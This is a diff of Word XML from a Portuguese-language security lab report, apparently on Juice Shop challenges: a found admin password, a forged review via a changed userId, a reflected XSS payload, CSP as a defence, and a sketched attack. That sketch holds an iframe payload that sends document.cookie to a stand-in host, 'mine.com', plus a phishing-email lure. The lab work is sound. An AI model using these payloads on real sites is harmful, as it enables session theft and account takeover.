+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 200</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="017F0439" wp14:editId="66B8C6A1">
+            <wp:extent cx="5400040" cy="708025"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1178401247" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1178401247" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="708025"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>sendo a senha correta admin123.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Zap </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>desafio</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Para resolver o desafio utilizando o ZAP é possível através de:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Criar uma conta e publicar uma </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>review</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de um produto</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Capturar o mesmo no ZAP e verificar quais os parâmetros que são enviados</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">É possível aferir o uso de um </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>userId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> no pedido, utilizar o ZAP para alterar os parâmetros enviados e submeter </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>novamente</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>alterou-se o userId para 1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C8C7C1" wp14:editId="156E90BE">
+            <wp:extent cx="5400040" cy="2827655"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2036579609" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2036579609" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2827655"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>É possivel verificar que o pedido foi aceite e ficou publicado noutro utilizador</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cross-site </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Scripting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (XSS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">O elemento HTML </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>&lt;span _</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>ngcontent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>-ng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>c62</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>25</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>=""id="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>searchValue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>"&gt;Lemon1&lt;/span&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Para resolver o desafio bas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>ta adicionar no URL ou na query de search: &lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>iframe src="javascript:alert('xss')"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>, visto não ter qualquer tipo de sanitização por parte da aplicação</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04800AE8" wp14:editId="15482312">
+            <wp:extent cx="5400040" cy="2750185"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="933867805" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="933867805" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2750185"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13B61141" wp14:editId="6AB5D0E5">
+            <wp:extent cx="5400040" cy="1651000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="1639545981" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1639545981" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1651000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Recorrendo ao controlo de segurança CSP permite controlar a que recursos o browser carrega numa página, podendo por exemplo, bloquear código javascript de executar, bloqueando assim o alert anterior de ser executado. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">Também é possível bloquear recursos de serem carregados </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>caso não pertençam ao conteudo autorizado, recorrendo ao uso de hashs que permitem ou não que javascript seja executado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Cross-site Scripting (XSS)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>at</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>aques</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Um possível ataque seria:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Em vez de um alerta enviar um pedido para um website conhecido pelo malfeitor que remetia as cookies do utilizador autenticado.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> src="</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>javascript:fetch</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('https://</w:t>
+      </w:r>
+      <w:r>
+        <w:t>mine</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.com/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>auth</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?cookie='+document.cookie)"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Codificar um URL malicioso, u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>tilizando por exemplo, a vulnerabilidade antiga do search, e obfuscar o URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Enviar um email para utilizadores do website a incentivar o acesso do mesmo através do link malicioso, por exemplo, “Vem ver quantos gostos o teu post já tem”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>Através do token da vitima é possível obter os dados do website da mesma, desde o respetivo userId,  email, e outr</w:t>
+      </w:r>
+      <w:r>
